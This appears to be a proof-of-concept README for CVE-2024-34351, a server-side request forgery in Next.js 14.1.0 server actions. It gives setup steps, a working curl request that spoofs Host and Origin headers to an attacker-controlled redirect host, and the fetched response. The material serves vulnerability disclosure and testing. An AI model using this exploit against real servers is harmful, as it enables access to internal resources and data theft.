- Next.js Server-Side Request Forgery in Server Actions · CVE-2024-34351 · GitHub Advisory Database
- Digging for SSRF in NextJS apps
An attacker can make the Next.js server fetch the content of any website using the CVE-2024-34351 vulnerability:
This Next.js (next@14.1.0) server has a vulnerable redirect action, shown in `nextjs-CVE-2024-34351/src/app/actions.ts`, lines 5 to 8 at commit 687c1ff.
This vulnerability is fixed in next@14.1.1.
Start the Next.js server, which uses next@14.1.0:

```sh
npm install
npm run dev
```
The attacker needs to prepare a redirect server for sniffing.
- Source: `attacker-server/main.ts`

https://nextjs-cve-2024-34351.deno.dev/ is deployed for this PoC.
Finally, the attacker can make the Next.js server fetch any website's content through the SSRF vulnerability:
- Set the `Host` header to the attacker server
- Set the `Origin` header to the attacker server
```sh
curl 'http://localhost:3000/' \
-H 'Host: nextjs-cve-2024-34351.deno.dev' \
-H 'Accept: text/x-component' \
-H 'Accept-Language: ja,en-US;q=0.9,en;q=0.8' \
-H 'Cache-Control: no-cache' \
-H 'Connection: keep-alive' \
-H 'Content-Type: text/plain;charset=UTF-8' \
-H 'Next-Action: 1529e716c9db41d5ce462b285ea3d42d09292bd2' \
-H 'Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D' \
-H 'Origin: http://nextjs-cve-2024-34351.deno.dev' \
-H 'Pragma: no-cache' \
-H 'Referer: http://localhost:3000/' \
-H 'Sec-Fetch-Dest: empty' \
-H 'Sec-Fetch-Mode: cors' \
-H 'Sec-Fetch-Site: same-origin' \
-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
-H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "macOS"' \
--data-raw '[]'
```
The response body returned by the Next.js server is the "Example Domain" page, fetched on the server's behalf:

```html
<!doctype html>
<html>
<head>
<title>Example Domain</title>
<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style type="text/css">
body {
background-color: #f0f0f2;
margin: 0;
padding: 0;
font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
}
div {
width: 600px;
margin: 5em auto;
padding: 2em;
background-color: #fdfdff;
border-radius: 0.5em;
box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
}
a:link, a:visited {
color: #38488f;
text-decoration: none;
}
@media (max-width: 700px) {
div {
margin: 0 auto;
width: auto;
}
}
</style>
</head>
<body>
<div>
<h1>Example Domain</h1>
<p>This domain is for use in illustrative examples in documents. You may use this
domain in literature without prior coordination or asking for permission.</p>
<p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
</html>
```